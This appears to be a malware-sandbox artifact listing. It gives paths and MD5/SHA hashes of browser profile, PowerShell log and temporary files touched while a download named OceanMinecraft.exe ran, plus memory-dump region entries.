                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  9KB

                                                                  MD5

                                                                  eda2a008f020271cd6d005a63fb73c85

                                                                  SHA1

                                                                  2f33f0a480d09cdd3538f9633a3f9c03a96e730c

                                                                  SHA256

                                                                  a9466e75e8e5b04c82749aec7ea9ed91df8a161681643f43954554c0291206e8

                                                                  SHA512

                                                                  b2753525a3f2874516cf100a2fea80ba8542d8100594d873f57194c92c18025fa9c292049af4572cc18b8305df0092309e1ec5a9b85c8816aa2e6dd4d56fb055

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  69afe46e6d43d3b1459034545461caee

                                                                  SHA1

                                                                  812d61b4a67caaa0e49a9b45bee3fe4711067eb1

                                                                  SHA256

                                                                  af168997a66dcf9c177d1810ad32b54059a79749b009f491bf3775d58f69cc7e

                                                                  SHA512

                                                                  80de98c5d8ab7759ea4c465a58bfea9dbf2ecda9bf8467fe7b135216c94f37297a829210dda4148caef68ab066f3a1045fb54b571d6b99a9befbd62b33e19bf9

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  a81c784c03b1e32ff85f887849f6573a

                                                                  SHA1

                                                                  b113f64c496aaef9f4fde4b29bb496459e8ad2e7

                                                                  SHA256

                                                                  e78be7a376fdf3fe71ed0fd69ccc181515ba5891aab0d7d761120f6f2673c5a0

                                                                  SHA512

                                                                  4d6a9bf0cbc1d5a96a1107ee1c9faa79fd1675237ccb915e34f2344d337d85607b6864e72be16ad5e86eafc85a08eb28258f1cc838ada50fc9ce95a32084c82a

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  4e486503c785a54a5b8b96e17a0d35f3

                                                                  SHA1

                                                                  367d31ab14ac27ecc7c7a4e8a0842bbf9360385e

                                                                  SHA256

                                                                  d85c564e4f99ea8fb6ffa97d22d4e448158e0459611ab335c4d173a54197db0b

                                                                  SHA512

                                                                  67f3eb5a32b1af4df412dbd5bcf7e8dd2db16ecd71768c7be5f2869eee037139133ea36fd1e2d0a31d0b866beb10138c22ebfb801c69ecc1c4503feeaad080f5

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  335a4ddf1413b270ebe88552962f3a0f

                                                                  SHA1

                                                                  9cdd61e7b99e8e90c73f9e5f7d6f5a1aaa9a777a

                                                                  SHA256

                                                                  17e15eb7d28ec0e4640ba5c06acaf0c92cfb232984dc5c58a67753701f75de4e

                                                                  SHA512

                                                                  6b171334e3320e7ec6a39ad338a11b6d89b5746ab33ef7f939ef8ffbfd4c0f7e35ba7ada2a8aaacfbe0d38f5cb16b8d4fdf6fdb45bf89d87d860daaa57443455

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  36fb2e4b01367d5f14092ddd10ee4abe

                                                                  SHA1

                                                                  4ed9ba5511510306d2e35752db53ce7f04e20417

                                                                  SHA256

                                                                  f2345c7120482f11e85bcc0d92ca86519fb888954f6c9bbf6a81a8aed198d805

                                                                  SHA512

                                                                  0ca01992b732ca0ed0b4bc518234ae40705c7ab80e9e1a3807f41d3ce4f16417992dc1ebabfca8642b0a8d12521c559e1173bc6974c0190fe9df91798199ac15

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  9KB

                                                                  MD5

                                                                  6ef9839bec10bf9e0ec4b0f7fdabd1cd

                                                                  SHA1

                                                                  0318bd56c571157fbdb13aee20cad3f04674dfa3

                                                                  SHA256

                                                                  5affde4acfb6aa594ae99dea764d6d64699ca3ca8937fa0c764ceaf07d059699

                                                                  SHA512

                                                                  31fd9a7e90e72aad43ac5f639c36d009561f49a8498cf1edb8759dad269da4514717bdb5200c790c420d625369dcf809b71dba90d09211e1949fac4361f76dce

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  c73d513753e88b49b5081c95a5f34d74

                                                                  SHA1

                                                                  4543b26c175758d31127077d668294837b66c3de

                                                                  SHA256

                                                                  9a5e36fb38f96d63be811f338cec751c1ef797309bb8a22e01b34a4f0e61fd81

                                                                  SHA512

                                                                  2f71c58db7119e61171f657525eed1fe762827f03de9c26b4021bd70d828b1264193b7168fd449f551c70b3c51919c82ec599c9c6e2cd71f9785115d85a9e2e1

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  82b11715c9f307e041266261bb7f9ab3

                                                                  SHA1

                                                                  60cfd7afd370595e1efe4325db6fc3028d0fd1a5

                                                                  SHA256

                                                                  982d12dd7b0f65cd1ccbbf7ebd3723e7ecfec368becd9a569ac0081847c5a5ed

                                                                  SHA512

                                                                  db529d5407b893d412018668ab6f8b46d31c69de2613ab29e5d02ae61253d1971259cc8e666b69043c0a6ee0b37d326c317c6ade1596ea287888b93e18dc6d00

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  6736b6d177da5fe3648b94b0e91af641

                                                                  SHA1

                                                                  0b0c3fa79f122bca8335613b2b993f4fa41c47d9

                                                                  SHA256

                                                                  03526f05604af2db65bbfc1ecce81e6e47151a212cad6f9b954a05ec55ffac45

                                                                  SHA512

                                                                  a4c13c1f28f56925857743cea9daeb5683598bba85f1243fb2b6823e15615c7380bf6c08112b266fb1454d0340ba8dfd4d096e38edabfd08477a1d45e24be4d7

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  42628ef92344529491e6a71cc26617fb

                                                                  SHA1

                                                                  825f0f096498e72a43c03fea76221af936069a3d

                                                                  SHA256

                                                                  559c4b7f33f22bd60a63a5771edbf72e261b659a19be8c084e22fd9607cd7250

                                                                  SHA512

                                                                  d589c3ae680987a6880902c9cf869c5d7567f02cbcf6c84e30d9069ff1f67d160aa92d1218fc4f0089ea8a1e2c3716272cf0a571bc771bafc5f2450138eb13ef

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  6c1fee344ff25eaed04de793862ca28b

                                                                  SHA1

                                                                  48e1f125ddeb2bdd3121005d04d270392e05c5d9

                                                                  SHA256

                                                                  bcdddc68b5f7d62bddbb40d479269b6db04bcb1dfeab0892decf73d807d0334e

                                                                  SHA512

                                                                  2283e3d26e677927578f63e9ef594d565d9b04a56c7749cdf260fb9177fb864a72656a0285148506d57a740e086125d8b9203796f51271032b222ddcf6e128d9

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  5448b3f08445de0304e88248a7423d75

                                                                  SHA1

                                                                  59eaa4a1ee072eeec9e9357a334fc9ab100920e3

                                                                  SHA256

                                                                  eca627a7f4b7652bc80866459450663f02f22fe2b788c05e7ed32c299e4e7f0c

                                                                  SHA512

                                                                  f6ce028acd2c79f63f88eb91697bf407670440433c9738ed197b3853c75ee25c833c56a4bca4bc01f817b82724ca78d349871fa368fca8181a63ceb1dd49b3a6

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  83ef7de5e01ac4bb641a054bfd50f5cf

                                                                  SHA1

                                                                  af20569a4b3006d33dfc2c3e22e1f0de6c81439a

                                                                  SHA256

                                                                  48c4ce049eb66c8926b974badd2b27bcfb56684371fac1417f9caadfa32d2eba

                                                                  SHA512

                                                                  70b32c40f1bc9192d3ffef82d3ef7a59161d45413c2f2f3721b1e57f93e39c27476d4fd774130b186fef25ea598b4cdcfd36b2f14b1aed5bd14f17a5dee8fd6c

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  5c01399ee6ededc5e3b0538319195ac5

                                                                  SHA1

                                                                  779d32ef307c74586c5e52afb69e23badfc9cc26

                                                                  SHA256

                                                                  1b363a55ff83950b396e8bda13a5ffff5a07d7781093be4de1bd1d90027f97ec

                                                                  SHA512

                                                                  394794cb82ac8552788d0540d6526dd6173d6b40348b05904638ffd523f2199947057659e355ae8f62d296ffe1fc18a90ced98202ce6975a7a3f86ed27bfd48e

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  902a7f0195fb1fcf937e821bd2c061cd

                                                                  SHA1

                                                                  25e23fe1399a48157a43b575472ba5c4b78c8370

                                                                  SHA256

                                                                  b891b0e6708fcd563aad22b0f984b72e8f8321a9b4824a7dcc52a82bba7061a3

                                                                  SHA512

                                                                  0b51ca556f7ecc2cc8bb9e92d868c0dfa909e0aca53074f69f8089dff49032df6964499e8b281018568950421057bf983ea32c252a2889a523b6c3a059a2ac01

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  79d7989a4468e90f5ce97bf585354309

                                                                  SHA1

                                                                  199edd1ede0603382a02d8c2c9379ab0ddcfe762

                                                                  SHA256

                                                                  6eda0614331ef5c7b3e41c891c2a7ec67464a05d3fb560a6c382744ecddb4f3b

                                                                  SHA512

                                                                  2fdfd9a058df2f13e66e56221603db4d9995171e0245c11ad0cc39db93373e452334566f720ecdaad5177aa0bdc4a383c13f5b1d359582c3c2c764d65445c36e

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  d8d562481d7f05a07db8a99e807ccc5d

                                                                  SHA1

                                                                  a9a0a5870e61348496c47e0024a8a01777815b87

                                                                  SHA256

                                                                  e52392adc1f65df17e71e44e37b2ff82e511c49f7ad809ed9fd56cb727e212d2

                                                                  SHA512

                                                                  3cc6157f2e1b7e1cf22a618856a59e7f8d5f3b2c4225e04d70de6867b083f77a7b19647031ef6b1429655670c4f2e1024360df480ed07cdad885d38cd60d56fe

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  047532b7bbcaa91f42a509ad5ddd4a4e

                                                                  SHA1

                                                                  3b8aa57baf8bb6186d1365de54e5693317b58e1c

                                                                  SHA256

                                                                  692dbd02c75c9b3a5f878e99585b0ed67ac763542dd2d6f5273bfae0ed4a3ff5

                                                                  SHA512

                                                                  5795ac982a0db3400ae49a17b4a63be993887b9e1254115e6716d40a0523930ef80ab56ddd93a9530f20a5b1c02cef18a0663aa636d6b5dd2d3b52a6b5ffc103

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  d2eaab39f809e8d964a42721f0bf5ad1

                                                                  SHA1

                                                                  6160265124be69a76c6ddf45371a5d6218f40059

                                                                  SHA256

                                                                  7b74a296e6f3f05ae8b6bcb2da87fee0db05a86c7bf497db9b75dc79f6e2b37e

                                                                  SHA512

                                                                  fa6b555368f955d7af63b149f827bee7f8263ba0ebaa88cd72b47028a9db3c451c7b5c9fa3685b1cc321bb9389285d6a9da223362bb8ca3edce0c5a7d2ae6111

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  2ef6e19c69c7452b6d25f1c47cb4489a

                                                                  SHA1

                                                                  abfc647433baedcef2972390925d7a1357fca28a

                                                                  SHA256

                                                                  0c276a72457bec29466145c2cbb5395105bf9adb2f466b022b7ee2483f84dedf

                                                                  SHA512

                                                                  c06196d835088b0bbccc6798cd59cb52430726df112111bb12cff2ab7a7a1b7f6b8a6c0ae0d83c232e57f553e70b37f2ed7061bff249a1a34b42efd27d07ce35

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  d48e6c1ed72af668bb8c902dedb655ef

                                                                  SHA1

                                                                  0dc5409ff50ce74c264af1ab6818c95f073b4220

                                                                  SHA256

                                                                  a01417a1cbfc93364c87dd8e5643d47429bbd14a6e986d6df8b84a886a7dadd0

                                                                  SHA512

                                                                  5e4169576e4c1c7b40ef9674bdab66543f01b5f7e54d16bb295bf5db8b06d38601129283f6652c5a3d53376e20a5df42ac4090e6f6171d8f7c1d1b754e2627eb

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  4e2caee89b92d440770c08c7a7e41c53

                                                                  SHA1

                                                                  d986dc4d5ca712e4e8a12fd044aed33405b5675b

                                                                  SHA256

                                                                  6ff1100ad066c912e7000f75b26f69dfe144b9d296942b62d044fa30b8fb04bb

                                                                  SHA512

                                                                  68e30e0991cc58b1f2341584ae3f933255f9ff3cfd07fec0107045b6eac8156fa6051edafe6a4d0e7b2ef3e43d9f25c9872c584426e3c6912c7f48d2a12b99c8

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  e3980d8e3afb91f5bc6fb7e814f6b1fe

                                                                  SHA1

                                                                  6288cce99bf08570104775c8559d9b2de3b9b0e0

                                                                  SHA256

                                                                  ff71d26bce69d146486f6774d7d9c17ffb2681023dcb1d041ae5307d2039c6b3

                                                                  SHA512

                                                                  522e7a57ad7290b4547b3140536c0fcf63430119333d7d72fa8abf3bdcaaa40ead724beea155f17bf465df3aec488deaf6086b27e0f9e63ccb10a7b6e1f01839

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  2ee7de1c0f5f4f2b7f15acc8c426bdc7

                                                                  SHA1

                                                                  6de8553810c4cea2791c77bb9e95039339d8560e

                                                                  SHA256

                                                                  c01c944f14636479e0a4cae03710b1463787e664708090fc36e125c27df6952d

                                                                  SHA512

                                                                  af767fd6a657990fdc022500f4e2f49c38fa063781e8ae2f495d8bd381a8fcb689a418d051245044d3bec086b5db29f74825bd96f52e7e35ee34e67615ab78de

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  9a9808d50b308faf3a0f8ba948593235

                                                                  SHA1

                                                                  f88effc546a53386aaa52cc77d1dec974fe22360

                                                                  SHA256

                                                                  670417108161671195fe4364a425201e8fe789b11ba76862ad4924e39d1bba9a

                                                                  SHA512

                                                                  7e17d722bcefeb91294b41eb4820cf4887cb88b8d394cacf90e1e092c3b27584c8315fafa177db4f26a571cea6f594b261a06e770c8d9ae502e7bcb84d843e7f

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  03e472c7739781a9fe9d00b8198c4f99

                                                                  SHA1

                                                                  a5e616d31b41070895e15a8e766b8b1ccc23a7fc

                                                                  SHA256

                                                                  633c25e0e0a07350596203728ecd2cc5ee937828e814ce6cd136229efd8b0b82

                                                                  SHA512

                                                                  4b6029bc8237cd1abe26dd4b8de714fc9a0e70d364e2e439217bf1b2c1cdbd6c79c12f88afd344a208afa9a057fdf146e863fbffff6edb5c93323ba5f43b61af

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  4717542bd18e09342953bff2fd11178c

                                                                  SHA1

                                                                  ad99a2cc4a165017e4f4b6b064860b63b1a944ae

                                                                  SHA256

                                                                  205f77820f8d9ac07a92ea72cff07a8c5a499e74e23466e314baab1bf68ca4d9

                                                                  SHA512

                                                                  a239b8ac25c7ba5e9068eb83ad574157c9bae401a306405b4aae3db5c67e170c26c0cd238ae0185e75c1a860fe9c10c42da679a27af8a8857774051addd118ee

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  a1042ee2ff95a66978bf52402369b259

                                                                  SHA1

                                                                  2954f136fceef9c12d7406f073828f23bce4452c

                                                                  SHA256

                                                                  617f4891b980d2125818495285602220ccc1bbc14a5ad0d80f7cc66a4c57388e

                                                                  SHA512

                                                                  78e58b016768ef98a6a26398c8f447417028f729743ab945c21ecd5fefc3e86b346a199a0f44a3cb1f9619591e2a67c25b21d6638a44b3450837702321d9b0f0

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
  Filesize  10KB
  MD5       2559ada419dce229bf313f77e2c53082
  SHA1      28f47f37adcf1b9b151a072c2e5b18376b81f8d6
  SHA256    54da1222dc1f0b7efe7fd1808e0d9643a2433156b4f5427ea83b8c61116898f5
  SHA512    457f43676e93355c8fbf564f774fe12eab791b6da742c2e8c0f1710eebde364d46ab4c0594eac8c04434c9a28ba4837b76287c6f2d8b051f0075ff3dbbd514ce

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
  Filesize  10KB
  MD5       707354254ea0094be0926359d5c3e05e
  SHA1      649a14b91e057a20a2b4b06ddd2474f12928b7eb
  SHA256    ff2cda5b79cf1fd953b9d6a0ed6a887ebc2c00a3ccd0ea193a8fea4b51c76aba
  SHA512    f9a4cffd06ab228412fa530d386d494894d2b54e245ed3410ccd628379eee2badfb3a120565521ac3f7a210dead41949d7307e09ed99ffc518b9cfbafcd120f1

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
  Filesize  10KB
  MD5       ce37a5c2cc9f44a06937a1f3b45bf414
  SHA1      7b8bab94b040edc456d4c08886e5c576c6c97e50
  SHA256    9232f342b2eb74974d376a46ea83dc7c2a85192f96b73339f334251dad6d0f58
  SHA512    470d25f016c2ecad8ff623a0d3c12a4429aa2d01bf016466de0b9118e123756b1132d06db61f99d66940e17b87950485414a190f24205bc944ada4784bf8ae3e

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\fff07dab-e97a-4424-9280-0c0bf8c4952e.tmp
  Filesize  10KB
  MD5       27c3ba0b3c82b6af25d113e38a2e8327
  SHA1      ef8f9ac95562738132415cc2d7f74698166eb63d
  SHA256    8e9216a63813d6a895e40a31fb9693f609d5ac1ec1fad977137d5e10bc0e186e
  SHA512    6d85b53f081ffee40aeae53375ef44b0ede37fae6965002bad2d76b342755796fc8b6292daa8fe63cfe73235778f37c7965b80f63fe42505269b3f6837c7def6

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
  Filesize  208KB
  MD5       6fe631e05fb2f952f36ec2eda36885ac
  SHA1      33533194f4a6f2e100eeb3aa1a35fa6bc3290d43
  SHA256    6252df4adfd4d2efb00fbeecdccdd1cd2c800893902d6095319eb08df819ab48
  SHA512    a3c0c2fe3d844473bdd6baeee0af17bcb34af4ff3f71c8e64144df6ff8c40dca890b78f2cf79c3efc815ff06723ef44f506e41e868258ca4efa7495ac856396e

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
  Filesize  208KB
  MD5       a9b586c95d261c54b2783140293a5a9e
  SHA1      8d826380c3726ba26b6c125a8e786b60c234fe7e
  SHA256    c5bb45850695ac291d56eea83de0e76717d05750c7279832012a0fa836ee2c4a
  SHA512    a24da503a23829fa398a6ef3f5801893514d7f2dc4114a3906e2765130e2e9270ef910fd189cb8f49314e554f8cab6dc53a20238b3437b4cb134c241259a90ae

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\f70d2532-f665-4d0c-bbd3-8acacc162d8c.tmp
  Filesize  207KB
  MD5       9cd30b599348cd68692492f381294580
  SHA1      7cbeca278d232cf70df2cbb9fd76b1d56eea8936
  SHA256    a1e4b1393df31c03965931f2e1c72b29ae0910e0284059d2a0bd2b73c657070f
  SHA512    f856cddb73fdea349dfc996eaae528a8be4e404014aafd71e4e04ecd0dd73252b556ee35a734e89d23e5d00ce31b31f14a7af688ed8caf87673046a400b43c27

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize  2KB
  MD5       d85ba6ff808d9e5444a4b369f5bc2730
  SHA1      31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize  948B
  MD5       721991167161c45d61b03e4dbad4984b
  SHA1      fd3fa85d142b5e8d4906d3e5bfe10c5347958457
  SHA256    0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb
  SHA512    f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize  944B
  MD5       6d42b6da621e8df5674e26b799c8e2aa
  SHA1      ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
  SHA256    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
  SHA512    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoif2h05.mm5.ps1
  Filesize  60B
  MD5       d17fe0a3f47be24a6453e9ef58c94641
  SHA1      6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\db\data.safe.bin
  Filesize  23KB
  MD5       0edea9c6b7bc8f8aed3854b2cd6bd3a2
  SHA1      d27419c1c9df4262a5dc57bb851d71bfd26e35f8
  SHA256    38fe0036a08d3c77c8cf5d516be99ad9c65772eda202392167b0a2f20a6102fd
  SHA512    4caee3230385e8c42b2df8bf6dedf8433c0f5d8af45af5f402826aec2311cc34754e6aef037576166a81a09b1ac450b96c5d04e1c64f7418d6c2446b7a05b48a

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\db\data.safe.tmp
  Filesize  21KB
  MD5       b5a85881034d7fdd8019be49613fa932
  SHA1      c18601a97a6a5dc6148e0a442d7e347c9759adbb
  SHA256    457e8b58c9c8c354a04a26cdae8f0ad24cc5f2eabd05ff93a42598d56f8f12f9
  SHA512    ba11c4c6f201aac091c2449701810ee06d8ed42a9d8ce54871dc4706cd661c99d75519261ff3501bbaad21f2ac963dc22ffdca2ca1f7fe144ff71691d126f91e

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\db\data.safe.tmp
  Filesize  23KB
  MD5       e7e4fea327b8ee132dfc21f32be93776
  SHA1      818a979350fe5222e93f3e058cf44c95d5347e01
  SHA256    8663224043c0495588e1e8824b0d3159da9b63aa3f4465834d4f3e76ca8bee09
  SHA512    b3205a174e295a9795bdbc80c9ac8eae8f0bff3119ad8243947726f9d9090841a8623a41c263939a766070b7abf6ac10caaac6c5e837932f27073fa6908fb75b

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\db\data.safe.tmp
  Filesize  22KB
  MD5       b769f803a6a6c2baed42692f3c175ea1
  SHA1      56235589495cd380f9c812a6a5c12040b9d8fd4c
  SHA256    4e891d47b6b0594bd626060541e2de6ba367fd3d0a2e8d2f2107cb04b41f3c02
  SHA512    22584139f155ab86f8de327f924afb77d343ed2a9ace66fa976ea02232392ed7b44644fa3eb8bb648de40a89b8d4c2ba86567ea98eb5689c38a29327970bacc6

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\pending_pings\5a92b3d2-c5f9-4ce0-991a-4266fc92a895
  Filesize  659B
  MD5       3c865ec003a3b2be5d065c6c4b22a3f6
  SHA1      9e545dc897efb1e2cb6d79971bcbceb6fcf5749f
  SHA256    8c97e0aa96a2cb50ffd81b5980e2c50e668b1c7c9af31aff5a09cdb3293603e6
  SHA512    36703bdc42687510dc207d28d1ae2301c0859c650ebdb943fae7cd81e4c697d27e06ee98cd73fe154359ac41eba3492c682a2ebdcb03803336d8150fa52bb725

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\pending_pings\aadaf3bd-42c1-4afb-962c-5dd570725c86
  Filesize  982B
  MD5       819e99dfcc504a96e94a0692939e5bac
  SHA1      5329d1a4ed83516f54f4982d6453edb9ae78ac1e
  SHA256    1a676dacd258735e742cea52630715b0af911731b0afdceed64ed1d78bfb14cc
  SHA512    bbd204ff5bb3ccf115336824f12081a32b3279f9cd0ab9c1191dfa7e71a128d7b155486e513bd2994e74626c0bf9f9370ba9dce8683046623c021530013bdaab

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\pending_pings\fdd083e9-de49-4c73-8692-ca4ed64fb083
  Filesize  3KB
  MD5       16b1465b01d72ae0e9c05f65026d9d30
  SHA1      867e2da19859cf47632afc57f50a8f280736c351
  SHA256    e4110e3fdbdfa0d92e97529a0a4362f455c20d1aaace7e3d6059360cd75833ac
  SHA512    39b953fb79032173960a319cc30d962e596d5bddbf908fa3812d59da31582558fd7dd534a46979265795684835ba27b897f7c5ef7b6f7fa2fbfa00d36a236767

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\prefs-1.js
  Filesize  10KB
  MD5       78efc43a22596a61c99523c582efab1c
  SHA1      22fdcac1a9bf14ee41c61c1edb75a0948392b31b
  SHA256    e66dd4a0d003a902ebbdf7f7eecd24b6b8b095ccb622a3734b4e8eba009fd64c
  SHA512    8be6195f1c3afa5c5b7dc361d6f8df6dfab4f583f9489e961b23bc91d47c4ea4f667a1910518df492d1d0ee7c26aa484417e086f888b9cc5ed7776dd60eeb64f

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\prefs-1.js
  Filesize  11KB
  MD5       9845e0ad1fdc7e9c0641da5b21a189ed
  SHA1      9c96c5f91fc508f9ec2433b855c4fc4ac9bc8192
  SHA256    533c50b563086025a353167294bc1a9232ad2814cf9c9ecc6fa047332401b0fe
  SHA512    db4e8abbfff808c859cfa45413360223de3a8762fcf4dab690ee8534b9d35a78ad99283a42c87791951d2cd24ffc11875f42d767b6ad05bb0a51fd3f7416e70f

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\prefs.js
  Filesize  11KB
  MD5       275ac1d72a1ead3379e0fb8d54368c1d
  SHA1      e412de654e07bfa3d0825c8fe441f3db050dd62a
  SHA256    2842574cf27787e8cb339bf08c6b0a6ea0a82e8b77bc421611d3093ea4d5e3a1
  SHA512    59a3af4c13a3e36c0797641e971ecdbeaaa155a029b847c6ef29a4463596003cd516302ec57851e35e01420d90e55c63b513e4c3034562b7a489d443a9013d18

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
  Filesize  384KB
  MD5       10d032afcd702db0a562e2ea14374933
  SHA1      502f5d35c861b9c1f41690d3a9afee5aa8250155
  SHA256    908a7aafb06d1447c5b19f57a017688dcab859d89ae27bc6f3ea85fcd73cfb86
  SHA512    ddadef56a674ac5b23a8d6971091d6df9ddac34983baf4bb9431d3707a282d0b9c364f6b61225a3d2b2e1eecbce1afc6618636fe3c756629ce1de313954c7987

• C:\Users\Admin\Downloads\OceanMinecraft.exe.crdownload
  Filesize  7.7MB
  MD5       5a3d03a33500b65c35f569cd13172e53
  SHA1      ceeea6aeaf06478a5a1466bd92b1767a4bc3826b
  SHA256    64f0b8d07151832fb135fef20526f71d0f37692c6be8b5814052382e234acca1
  SHA512    22ba3308d0a411251edc613ded45dcaf2724179244ac815cb3b20329cbe264e216dc3afe9748935ff298ec81836b2f2d777eced60f57a8d5b30151354d349790

• memory/2452-16-0x00007FFC091C0000-0x00007FFC09C81000-memory.dmp
  Filesize  10.8MB

• memory/2452-1-0x00000202D6A50000-0x00000202D6A72000-memory.dmp
  Filesize  136KB

• memory/2452-0-0x00007FFC091C3000-0x00007FFC091C5000-memory.dmp
  Filesize  8KB

• memory/2452-13-0x00007FFC091C0000-0x00007FFC09C81000-memory.dmp
  Filesize  10.8MB

• memory/2452-12-0x00007FFC091C0000-0x00007FFC09C81000-memory.dmp
